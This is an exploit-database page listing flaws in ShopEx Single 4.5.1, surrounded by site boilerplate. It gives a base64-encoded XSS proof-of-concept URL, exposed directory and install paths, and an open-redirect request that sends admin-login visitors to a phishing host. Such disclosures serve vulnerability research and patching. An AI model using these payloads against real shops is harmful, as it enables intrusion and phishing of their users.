0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ShopEx <= Single V4.5.1 Multiple Vulnerabilities
================================================ ShopEx <= Single V4.5.1 Multiple Vulnerabilities ================================================ # Software Link: http://www.shopex.cn | http://www.shopex.cn/download/ # Version: <= Single V4.5.1 # Tested on: PHP # ##[Cross Site Scripting] (Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it) http://server/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg== # # ##[Directory Listing] http://server/syssite/home/ http://server/icons/ http://server/syssite/dfiles http://server/templates/ http://server/syssite/shopadmin/images/ http://server/syssite/shopadmin/user_guide/ # # ##[Open Redirection:] (OWASP: An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.) The admin login page (http://server/syssite/shopadmin/login.php) redirect the none-authentication users the the "document.referrer" page. The attacker can exploit the mechanism to trick the victim like that: # # HTTP REQUEST: GET /syssite/shopadmin/login.php HTTP/1.1 Host: [SERVER] Referer: http://www.PHISHING.com # the user will be sent to the original page but will be redirected to the PHISHING site. # the vulnerable code is: (in: http://server/syssite/shopadmin/login.php) # # # ##[Unprotected Install Proccess:] http://server/syssite/install/home.htm # 0day.today [2024-11-15] #